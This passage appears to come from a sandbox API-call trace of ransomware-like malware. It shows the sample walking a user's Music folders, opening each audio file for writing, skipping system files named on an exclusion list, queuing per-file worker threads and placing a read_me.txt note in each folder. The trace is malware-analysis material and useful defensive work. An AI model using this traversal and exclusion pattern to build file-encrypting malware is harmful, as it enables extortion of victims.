(lpFirst="szlbr.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.174] StrStrW (lpFirst="szlbr.m4a", lpSrch="desktop.ini") returned 0x0 [0076.174] StrStrW (lpFirst="szlbr.m4a", lpSrch="autorun.inf") returned 0x0 [0076.174] StrStrW (lpFirst="szlbr.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.174] StrStrW (lpFirst="szlbr.m4a", lpSrch="iconcache.db") returned 0x0 [0076.174] StrStrW (lpFirst="szlbr.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.175] StrStrW (lpFirst="szlbr.m4a", lpSrch="boot.ini") returned 0x0 [0076.175] StrStrW (lpFirst="szlbr.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.175] StrStrW (lpFirst="szlbr.m4a", lpSrch="thumbs.db") returned 0x0 [0076.175] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 117 [0076.175] QueueUserWorkItem (Function=0x404e00, Context=0x954, Flags=0x0) returned 1 [0076.175] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x665df330, ftCreationTime.dwHighDateTime=0x1d4c630, ftLastAccessTime.dwLowDateTime=0x7b2b5930, ftLastAccessTime.dwHighDateTime=0x1d4cd3b, ftLastWriteTime.dwLowDateTime=0x7b2b5930, ftLastWriteTime.dwHighDateTime=0x1d4cd3b, nFileSizeHigh=0x0, nFileSizeLow=0x13ffd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zCnP0SsfIwje8h7k.wav", cAlternateFileName="ZCNP0S~1.WAV")) returned 1 [0076.175] wnsprintfW (in: pszDest=0x8cf1088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\zCnP0SsfIwje8h7k.wav") returned 81 [0076.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\zCnP0SsfIwje8h7k.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\zcnp0ssfiwje8h7k.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x958 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="read_me.txt") returned 0x0 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="autoexec.bat") returned 0x0 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="desktop.ini") returned 0x0 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="autorun.inf") returned 0x0 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="ntuser.dat") returned 0x0 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="iconcache.db") returned 0x0 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="bootsect.bak") returned 0x0 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="boot.ini") returned 0x0 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="ntuser.dat.log") returned 0x0 [0076.175] StrStrW (lpFirst="zcnp0ssfiwje8h7k.wav", lpSrch="thumbs.db") returned 0x0 [0076.175] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 118 [0076.175] QueueUserWorkItem (Function=0x404e00, Context=0x958, Flags=0x0) returned 1 [0076.175] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5eef1a30, ftCreationTime.dwHighDateTime=0x1d4c9c7, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_9bVvSR0NC3", cAlternateFileName="_9BVVS~1")) returned 1 [0076.175] wnsprintfW (in: pszDest=0x8cf1088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3") returned 72 [0076.175] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5eef1a30, ftCreationTime.dwHighDateTime=0x1d4c9c7, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_9bVvSR0NC3", cAlternateFileName="_9BVVS~1")) returned 0 [0076.175] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.176] wnsprintfW (in: pszDest=0x8cf1088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\read_me.txt") returned 72 [0076.176] GetProcessHeap () returned 0x4f10000 [0076.176] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cf1088 | out: hHeap=0x4f10000) returned 1 [0076.176] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 69 [0076.176] GetProcessHeap () returned 0x4f10000 [0076.176] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d11098 | out: hHeap=0x4f10000) returned 1 [0076.176] GetProcessHeap () returned 0x4f10000 [0076.176] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d11098 [0076.176] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\*") returned 74 [0076.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5eef1a30, ftCreationTime.dwHighDateTime=0x1d4c9c7, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.176] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\.") returned 74 [0076.176] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5eef1a30, ftCreationTime.dwHighDateTime=0x1d4c9c7, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.176] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\..") returned 75 [0076.176] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5599f40, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0bfITs5We", cAlternateFileName="0BFITS~1")) returned 1 [0076.176] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We") returned 82 [0076.176] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17f1d060, ftCreationTime.dwHighDateTime=0x1d4d033, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A0YKGsoY8M31ETQ", cAlternateFileName="A0YKGS~1")) returned 1 [0076.176] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ") returned 88 [0076.176] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e8c3450, ftCreationTime.dwHighDateTime=0x1d4c791, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c3ErMl5xQUkjb", cAlternateFileName="C3ERML~1")) returned 1 [0076.176] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb") returned 86 [0076.176] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa615c910, ftCreationTime.dwHighDateTime=0x1d4d271, ftLastAccessTime.dwLowDateTime=0xfa3aa460, ftLastAccessTime.dwHighDateTime=0x1d4cb01, ftLastWriteTime.dwLowDateTime=0xfa3aa460, ftLastWriteTime.dwHighDateTime=0x1d4cb01, nFileSizeHigh=0x0, nFileSizeLow=0x17720, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fS9GjsjJwR37CUgZ5.mp3", cAlternateFileName="FS9GJS~1.MP3")) returned 1 [0076.176] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\fS9GjsjJwR37CUgZ5.mp3") returned 94 [0076.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\fS9GjsjJwR37CUgZ5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\fs9gjsjjwr37cugz5.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x95c [0076.176] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="read_me.txt") returned 0x0 [0076.176] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.177] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="desktop.ini") returned 0x0 [0076.177] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="autorun.inf") returned 0x0 [0076.177] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.177] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="iconcache.db") returned 0x0 [0076.177] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.177] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="boot.ini") returned 0x0 [0076.177] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.177] StrStrW (lpFirst="fs9gjsjjwr37cugz5.mp3", lpSrch="thumbs.db") returned 0x0 [0076.177] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 119 [0076.177] QueueUserWorkItem (Function=0x404e00, Context=0x95c, Flags=0x0) returned 1 [0076.177] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dc07d80, ftCreationTime.dwHighDateTime=0x1d4d31d, ftLastAccessTime.dwLowDateTime=0xfc0e4ae0, ftLastAccessTime.dwHighDateTime=0x1d4d370, ftLastWriteTime.dwLowDateTime=0xfc0e4ae0, ftLastWriteTime.dwHighDateTime=0x1d4d370, nFileSizeHigh=0x0, nFileSizeLow=0x2c9a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nVA6X.wav", cAlternateFileName="")) returned 1 [0076.177] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\nVA6X.wav") returned 82 [0076.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\nVA6X.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\nva6x.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x960 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="read_me.txt") returned 0x0 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="autoexec.bat") returned 0x0 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="desktop.ini") returned 0x0 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="autorun.inf") returned 0x0 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="ntuser.dat") returned 0x0 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="iconcache.db") returned 0x0 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="bootsect.bak") returned 0x0 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="boot.ini") returned 0x0 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="ntuser.dat.log") returned 0x0 [0076.177] StrStrW (lpFirst="nva6x.wav", lpSrch="thumbs.db") returned 0x0 [0076.177] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 120 [0076.177] QueueUserWorkItem (Function=0x404e00, Context=0x960, Flags=0x0) returned 1 [0076.177] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24b8e0c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.178] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\read_me.txt") returned 84 [0076.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x964 [0076.178] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.178] CloseHandle (hObject=0x964) returned 1 [0076.178] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf13dbaf0, ftCreationTime.dwHighDateTime=0x1d4cde0, ftLastAccessTime.dwLowDateTime=0x11781cd0, ftLastAccessTime.dwHighDateTime=0x1d4d47a, ftLastWriteTime.dwLowDateTime=0x11781cd0, ftLastWriteTime.dwHighDateTime=0x1d4d47a, nFileSizeHigh=0x0, nFileSizeLow=0xf928, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rncK.mp3", cAlternateFileName="")) returned 1 [0076.178] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\rncK.mp3") returned 81 [0076.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\rncK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\rnck.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x964 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="read_me.txt") returned 0x0 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="desktop.ini") returned 0x0 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="autorun.inf") returned 0x0 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="iconcache.db") returned 0x0 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="boot.ini") returned 0x0 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.178] StrStrW (lpFirst="rnck.mp3", lpSrch="thumbs.db") returned 0x0 [0076.178] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 121 [0076.178] QueueUserWorkItem (Function=0x404e00, Context=0x964, Flags=0x0) returned 1 [0076.178] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf13dbaf0, ftCreationTime.dwHighDateTime=0x1d4cde0, ftLastAccessTime.dwLowDateTime=0x11781cd0, ftLastAccessTime.dwHighDateTime=0x1d4d47a, ftLastWriteTime.dwLowDateTime=0x11781cd0, ftLastWriteTime.dwHighDateTime=0x1d4d47a, nFileSizeHigh=0x0, nFileSizeLow=0xf928, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rnck.mp3", cAlternateFileName="")) returned 0 [0076.179] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.179] wnsprintfW (in: pszDest=0x8d11098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\read_me.txt") returned 84 [0076.179] GetProcessHeap () returned 0x4f10000 [0076.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d11098 | out: hHeap=0x4f10000) returned 1 [0076.179] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 70 [0076.179] GetProcessHeap () returned 0x4f10000 [0076.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d310a8 | out: hHeap=0x4f10000) returned 1 [0076.179] GetProcessHeap () returned 0x4f10000 [0076.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d310a8 [0076.179] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\*") returned 84 [0076.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5599f40, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.179] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\.") returned 84 [0076.179] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5599f40, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.179] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\..") returned 85 [0076.179] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc001fb50, ftCreationTime.dwHighDateTime=0x1d4ca65, ftLastAccessTime.dwLowDateTime=0x231757d0, ftLastAccessTime.dwHighDateTime=0x1d4c8c2, ftLastWriteTime.dwLowDateTime=0x231757d0, ftLastWriteTime.dwHighDateTime=0x1d4c8c2, nFileSizeHigh=0x0, nFileSizeLow=0x6b58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0gMoTR0qq.mp3", cAlternateFileName="0GMOTR~1.MP3")) returned 1 [0076.179] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\0gMoTR0qq.mp3") returned 96 [0076.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\0gMoTR0qq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\0bfits5we\\0gmotr0qq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x968 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="read_me.txt") returned 0x0 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="desktop.ini") returned 0x0 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="autorun.inf") returned 0x0 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="iconcache.db") returned 0x0 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="boot.ini") returned 0x0 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.180] StrStrW (lpFirst="0gmotr0qq.mp3", lpSrch="thumbs.db") returned 0x0 [0076.180] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 122 [0076.180] QueueUserWorkItem (Function=0x404e00, Context=0x968, Flags=0x0) returned 1 [0076.180] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98039ff0, ftCreationTime.dwHighDateTime=0x1d4ced4, ftLastAccessTime.dwLowDateTime=0xb1c91ab0, ftLastAccessTime.dwHighDateTime=0x1d4cdf7, ftLastWriteTime.dwLowDateTime=0xb1c91ab0, ftLastWriteTime.dwHighDateTime=0x1d4cdf7, nFileSizeHigh=0x0, nFileSizeLow=0xeabf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BquehE5.m4a", cAlternateFileName="")) returned 1 [0076.180] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\BquehE5.m4a") returned 94 [0076.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\BquehE5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\0bfits5we\\bquehe5.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x96c [0076.180] StrStrW (lpFirst="bquehe5.m4a", lpSrch="read_me.txt") returned 0x0 [0076.180] StrStrW 